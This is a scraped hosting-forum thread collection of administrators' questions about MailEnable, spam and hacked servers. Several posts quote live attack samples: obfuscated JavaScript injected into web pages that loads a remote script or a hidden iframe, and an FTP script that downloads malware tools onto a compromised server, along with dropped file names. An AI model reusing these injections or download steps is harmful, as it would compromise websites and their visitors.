Malicious Mail Sent Out Via MailEnable On Localhost
Jun 5, 2008
we received a report of a malicious mail being sent from our servers. Problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs shows that the connection was made from 127.0.0.1 to the smtp service, but that's it.
We don't run mail services (pop3/imap/webmail) on the web servers, if that helps any. Have run out of ideas after sifting thru lots of logs (was trying to find if anyone called an application to send the mail and attachments out), but came up empty.
View 7 Replies
ADVERTISEMENT
Jul 9, 2008
I want to run a local Mail Server + Webmail Client (opensource. I googled and I found hmailserver[server] and Roundcube [webmail]. the problem that i can't config any of them
How have an other alternative for mail server or a solution
View 4 Replies
View Related
Jul 16, 2009
I have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?
CentOS 5.2 - 64bits
WHM+cPanel
Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
View 5 Replies
View Related
Mar 18, 2009
We are having a problem with a number of our websites hosted on Fasthosts reseller account where JavaScript is being maliciously inserted into a number of pages.
An example of the code that has been inserted can be found below:
<!--
document.write(unescape('xXz%3CAEqscripzHVt%20RMisAEqrRMicxXz%3DzHV%2FyI%2F6
yI7zHV%2E21wq5RMi%2E2xXz4wq6%2E3AEq4RMi%2FjqAEquwqexXzry%2EjsyI%3E%3CzHV%2Fs
crRMiiwqpzHVtwq%3E').replace(/yI|zHV|fW|xXz|RMi|wq|AEq/g,""));
-->
Which runs this script:
<script src=//67.215.246.34/jquery.js></script>
New pages have been created on a number of websites aswell as the above code inserted into existing pages.
After removing the above code from one particular website it has happened again.
Some of the websites being affected are just static websites with only HTML pages, others are dynamic ASP pages.
View 2 Replies
View Related
May 11, 2009
Has anyone here ever heard of a malicious script called Mulcishell, stored in the file mshell.php? I've seen a bunch of instances of the file in my clients' folders with permissions 777, and I want to know what it does and how it works. (I already deleted the file, knowing it was a malicious script, but I want to know how to prevent it from ever being executed on my server.)
View 1 Replies
View Related
Oct 27, 2008
all sites in my server have maliciose code:
</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
how to localize this code in my sites, using grep.
My server work in centos.
View 3 Replies
View Related
Jun 27, 2009
I am wanting to know if there is a way to stop files being uploaded to my vps, via ftp cpanel etc that are malicious..
I have been told there is a way to do this but i havent been told how..
Basicaly i want to know if there is something where i can add a list of keywords that are in the malicious files and what ever it is will stop them from being uploaded or if they manage to get uploaded onto my vps will it make them not work?
I am looking into this as i had an issue before where someone uploaded a shell onto my server :@ luckily it didnt cause no damage or he didnt get anywhere but i still want to be safe.
View 5 Replies
View Related
Jul 9, 2008
I've been having an issue with one of my sites were someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.
I have a dedicated server have already upgraded MySQL to the latest version as I though that might work but it hasn't.
View 8 Replies
View Related
Apr 5, 2009
for the first time in my sites life(10 year site) google blocked it. when you type my site google says that my site has malicious code in it.as we find it the problem in my site came from the company where i hosted it.we clear all the files for the malicious code and now its all ok.i want to ask if anyone knows for his experience how much days google will check my site again to see if all its ok.i send them before six hours via webmaster tools, a request for eaming agin my site,but i dont knwo how will do these. so i am asking anyone of you,who had same experience.any help will be appreciate.please help me with anything you think that might be useful for me to having my site back again in google correctly!
View 5 Replies
View Related
Apr 30, 2009
we have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?
The problem:
On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.
Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.
On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.
We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.
What we have done to attempt to secure the server:
1) We have installed SuPhp.
2) We have ensured that all scripts on the affected websites are updated and running the latest versions.
3) We have changed all the passwords.
Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.
The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.
One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.
Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?
[url]
View 14 Replies
View Related
Mar 8, 2008
I decided to apply PHP safe mode to my servers, considering:
- I cannot prohibit using exec functions (some binary uses are needed, like host, mysqldump, etc..)
- I cannot restrict at all via UID/GID method at bins due to several problems..
Safe mode is the final sollution, as I only need "safe_mode_exec_dir" config to set a folder with the necesary binaries... this will stop nobody user (Apache) to exec whatever it wants, like perl, binaries uploaded to an public insecure folder (exploits), or anything else... people only could exec() the binaries I want and where I want. This will stop finally 95% of my hack problems.
Well. The problem is safe_mode is enabled or not, but you cannot set o disable certain features of this safe mode, like UID/GID checks (*******!)...
I am trying to configure so only "safe_mode_exec_dir" would apply, so:
- Including UIDs checks disabled by:
safe_mode_include_dir = "/home/"
(tested)
- Some variables set to NULL, as safe_mode_allowed_env_vars or safe_mode_protected_env_vars...
- safe_mode_exec_dir = "/usr/phpbin/"
Great! with symbolic lynks in... the best sollution available for me.
- open_basedir = "/home/"
(for fopen, etc...)
Ok ok.. but problems there.. by example this one:
Quote:
Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 32015 is not allowed to access cache/dynamic_fields/modules.php owned by uid 99 in /home/yyyyyyyyy/public_html/chn/modules/DynamicFields/DynamicField.php on line 823
Great.. fopen is under UID/GID checks, but it is not an include, so safe_mode_include_dir would not apply...
Now fopen, link, unlink, etc.. functions are UID restricted and this seems to be impossible to disable.... pffffffff...
can you share your safe_mode configs or sollutions for this problem?
View 2 Replies
View Related
Sep 18, 2008
I would like to set up a localhost server with a mail server too, I usually use uniform server as I find it very easy to get up and running and carry around with me, are there any better solutions, I have found it difficult to get a mail server running on the uniform server. or maybe there are distributions that come with mail server ready built in?
View 0 Replies
View Related
Dec 5, 2008
when i click "Email Accounts" section in Helm see "Failed to get Email Accounts",also cant add any new Email Account,
Helm Log:
Cannot create ActiveX component. at Microsoft.VisualBasic.Interaction.CreateObject(String ProgId, String ServerName) at MailEnable.Administration.Mailbox.GetAutoResponderStatus() at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccount(String name) at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccountList() at MailEnableProvider.ListEmailAccounts(ProviderData CommandData) ......
View 3 Replies
View Related
Jun 18, 2007
free antispam tool for my MailEnable mail server.
I have found Pinta which claims to be an antispam software for MailEnable mail servers.
Did anyone heard of them? Is it safe? Does it do the work?
If you know any other antispam software
View 8 Replies
View Related
Feb 25, 2007
I didn't see this posted anywhere here so I just thought I'd give everyone who uses MailEnable a heads up. If you are not using the most up to date version of MailEnable, run to [url] and download it.
I have seen couple of dozen boxes getting infected because they had a MailEnable Standard 1.95 for instance (or Professional 2.11), or anything else that's not up to date. Virus(es) are severe and will cause you a lot of problems... if your server still hasn't been infected and you're not using the latest MailEnable, go upgrade right away!
If you are a hosting company and are using Plesk 7.6.1 you definitely have your helpdesk swapped by now. Biggest problem is that Plesk 7.6.1 comes with MailEnable Std 1.95 where the latest version is 1.981. I have seen servers that were clean OS installs, Plesk 7.6.1 installed and 5 minutes after the box was compromised.
If you are still able to access the box by RDP (or have access to it locally), make sure to disable MailEnable SMTP Relay Service. This is not a part of MailEnable and if you don't disable it you won't be able to remove rdriv.sys from your system32 directory which does quite something to your server. Also check for following:
C:windowssystem32a.exe
C:windowssystem32�ot.exe
C:windowssystem32�w.exe
C:windowssystem32gethashes.exe
C:windowssystem32getsyskey.exe
C:windowssystem32
c.exe
C:windowssystem32
driv.sys
C:windowssystem32start.bat
Make sure you don't have script1.txt in system32, and if you have it make sure to remove it. It contains:
open XXX.XXX.XXX.XXX (IP edited away by Boon Chuan to prevent abuse)
user anonymous
anonymous@on.the.net
lcd c:windowssystem32
get explorer.exe
get runservice_bis.dll
get kill.exe
get fport.exe
get hyberport.exe
get JASFV.INI
bye
Nothing has been heard from SWsoft about this issue yet...
View 6 Replies
View Related
Jun 15, 2007
I have MailEnable free on a windows server with Plesk 8.1.
I need IMAP so I thought at hMail. The problem:
I need to copy all the mail content to hMail as I understand Plesk will copy all the accounts except the mail content.
I have found that I can use some vbs from PMM but that requires me to know all the accounts passwords and to do manually every backup/restore for all the e-mails.
Is there an other way to switch to hMail without loosing the mail content ? (IMAPCopy is not an option as it need IMAP and that is not present in MailEnable free, and also needs all all the passwords for all the accounts).
An other problem, I do not have an other windows server so I cannot use Plesk Migration Manager to migrate accounts and then migrate back.
View 2 Replies
View Related
Jul 9, 2009
SmarterMail 5.x is setup on one of our servers into Plesk 9.2. Just wondering how I configure a domain to use an external mailserver.
For example, the domain mydomain.org is running it's own extermal
mailservers;
mail.mydomain.org
mail2.mydomain.org
In MailEnable I would do the following;
- Start | Programs | Mailenable Administrator
- MailEnable | MailEnable Management | Messaging Manager | Post Offices
- Expand the mydomain.org domain
- Right-click the Domains folder and choose 'Properties"
- Select the 'domain is disabled' checkbox
- Select the 'Act as Smart Host'
checkbox
- In the 'Redirect mail to' textarea enter in the external
mailserver names;
mail.mydomain.org
mail2.mydomain.org
How can I configure SmarterMail to use the external mailservers of a domain?
View 0 Replies
View Related
Feb 16, 2007
I'm using the free edition of MailEnable and need to configure each post office to copy all incoming and outgoing email to one of the email accounts on the same post office.
Is there a way to configure this ?
I know I can configure mail forwarding on incoming mail per account but need to do it for all acounts (except the audit account).
e.g. anythinghere@dbnetsolutions.co.uk
incoming or outgoing would be copied to audit@dbnetsolutions.co.uk
View 0 Replies
View Related
Feb 22, 2007
My server running mailenable is possibly sending out spam because ive had a returned mail saying my IP is on a blacklist at CBL.
IP Address 64.X.X.10 was found in the CBL.
It was detected at 2007-02-17 13:00 GMT (+/- 30 minutes), approximately 5 days, 5 hours, 30 minutes ago.
However when i checked my smtp and pop logs i only see small ammounts of mail thats been delivered.
When I run the netstat command have the following connections. The ones to the .nl domain looks strange
C:Documents and SettingsAdministrator>netstat
Active Connections
Proto Local Address Foreign Address State
TCP server:telnet server.indis.nl:3409 CLOSE_WAIT
TCP server:telnet server.indis.nl:3410 CLOSE_WAIT
TCP server:epmap dsl10-037.express.oricom.ca:2253 ESTABLISHED
TCP server:1121 ipchicken.com:http CLOSE_WAIT
TCP server:1122 ipchicken.com:http CLOSE_WAIT
TCP server:1136 ipchicken.com:http CLOSE_WAIT
TCP server:1138 ipchicken.com:http CLOSE_WAIT
TCP server:1199 ecostumeshop.com:domain ESTABLISHED
TCP server:telnet server.indis.nl:3326 CLOSE_WAIT
View 2 Replies
View Related
Oct 16, 2013
Next error:
C:Windows>"%plesk_bin%mchk.exe" --all --fix=all
Data error (cyclic redundancy check). (Error code 23) at BCryptDecrypt()
I restore all mail accounts from backup and use this command : "%plesk_bin%mchk.exe" --all --fix=all
How can I fix this?
View 3 Replies
View Related
Nov 7, 2013
Any LIMITS using MailEnable regarding hosting. How many domains (or maximum users) can serve?
I come from a Merak mail server solution .... with about 400 domains and 3000 users .... and I must admit that the server has had some problems.
Plesk provides MailEnable Standard edition .... but according to the Feature Comparison in this version .... should not be present IMAP ???
[URL] ....
I can use IMAP for customers?
View 2 Replies
View Related
Nov 5, 2014
My System is a Windows Server 2012 r2 with Plesk 12.
On this system i have installed MailEnable as my Mailserver.
So at the moment something is spam on this server, but i can't find out who is it.
Received: from win02.XXXXXX([MY IP] helo=WIN02.home)
(envelope-from <root@XXXXXXXX>)
id 1XlyHP-00038b-R0
for x; Wed, 05 Nov 2014 11:57:37 +0100
[Code].....
The header is meaning that the spams come from root@, but there is no account with the name root@...
On linux it is so easy to find the spam with qmail or postfix. Why mailenable it is so difficult
View 3 Replies
View Related
Mar 8, 2015
Plesk Windows 12, MailEnable mailserver
I added users directly to mailenable (using their migration utility to import from an old mail server which plesk does not support). The domains exist in plesk but not the individual email users/mailboxes.
Now I want to add those email users to plesk but it doesn't let (not surprisingly), when I try to add a user it returns an error: "Unable to update the mail account properties:mailmng failed: MEAOPO.Mailbox.AddMailbox failed"
My question is: How can I add the users that already exist in MailEnable to the plesk configuration? (i.e. ignore the error and add the user to the plesk database, or even better yet if plesk can read the configuration and add all users)
Tthe plesk kb articles suggest running mchk.exe but that is designed to take users from plesk and add them to mailenable, I need the reverse).
View 3 Replies
View Related
Sep 19, 2012
Is there a way to configure the mailing lists created with Plesk (using MailEnable 6.5) using Plesk or another web interface like it is possible with mailman under Linux?
It is not very convenient to be required to do such stuff via RDP (and so manual by me for every customer)...
View 1 Replies
View Related
Jan 19, 2014
I have been a Plesk Panel user for several years and I found PPA very interesting because of its great scalability.
It has been time consuming to figure it out how PPA handles several Plesk Panel aspects.
Does PPA has support for MailEnable disk usage calculation? If it does, where? and how often does it collect disk usage info from Mail Service Node??
View 3 Replies
View Related
Sep 19, 2013
I use Windows Plesk v 11.5.30 with Mailenable Standard Edition 7.0 version. In mailenable site i saw a new version of Mailenable standard version (7.5.1). URL...Can i download and update Mailenable version of my Windows PLesk? If i made this change and have problem can i do downgrande later?
View 2 Replies
View Related
Aug 2, 2013
A few months ago my Mailenable Postoffice Connector stop every hour. Sometimes more than one hour, sometimes less than hour.
I updated my Plesk to lasted version 11.5.30 but still has a problem,
When this happen the Email clients works without receive any message until i started the Mailenable Postoffice Connector again.
I'm loosing a lot clients because of this.
I use Microsoft Windows Server 2008 with all updates installed.
[URL]....
View 4 Replies
View Related
Mar 20, 2014
I have 2 webspaces on my server, www.a.com and www.b.com
I initially setup www.a.com, everything works fine and I can access the emails for a.com through webmail.a.com
Then I setup www.b.com using almost identical DNS settings, except that each domain has its own dedicated IP
Now, the problem is I am not able access webmail.b.com, the error message is server not found, why is this?
It seems that I can only access the emails for b.com using webmail.a.com
I have mailenable version 8 standard installed...
View 2 Replies
View Related
Oct 10, 2014
i manage linux apache webserver with a few wordpress blogs and from time to time i see someone inject a malicious .php file into wp-content/uploads/2014/10/ directory.
i think its some bad plugin or theme, but these is more blogs, i ugrade, update, WP, but
how can i setup some monitor to tell me which php file (or even line in php file) injected that malicious .php ? I have linux root access so i can setup anything
View 3 Replies
View Related
